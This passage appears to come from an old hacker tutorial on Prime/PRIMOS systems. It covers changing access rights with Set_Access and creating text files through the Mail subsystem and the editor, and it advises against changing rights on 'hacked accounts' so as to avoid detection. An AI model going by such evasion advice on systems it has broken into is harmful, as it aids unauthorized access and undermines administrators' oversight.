you have enough privileges (priority levels) you can do the following to
change the access rights:
OK, Set_Access ALL [-LUR]
This is setting access from ALL to LUR. ALL was the present access, now we
changed it to LUR. You should only do this if it's your own personal account
as changing access rights on hacked accounts could lead to your detection and
subsequent expulsion from the system.
To create a file, preferably a text file, type "Mail pathname", then you will
be thrown into the Mail subsystem which I believe is version 3.1 now. You can
type in all the info you want, when finished hit a Control-P. It will ask you
for a pathname to save it to. Enter the name you would like. It will look
something like this:
OK, Mail DOE
Mail 3.1
>Hello. This is your system operator. Any ideas on how to keep those
>pesky little computer criminals out of our system?
>Comments can be directed to SYSTEM.
Enter Filename: Pesky.Txt
The above method is rather primative but works good if you are only creating a
text file. It is a common method used on version 18, and is easy to perform.
The other method is more common on version 19, and is commonly used today.
OK, Create Test.Txt
OK, Ed
EDIT
$
Note: $ is not dropping you into DCL, so you DCL programmers are out of
luck (chuckle).
From the $ prompt you can type 'help' to get a list of commands which can be
used in the Editor.
$ (return)
By hitting return we are given the "&" prompt, here we can input our
file. Or if you know CPL you can start programming. Do not hit return
on a blank line or you will be thrown into the main Editor prompt ('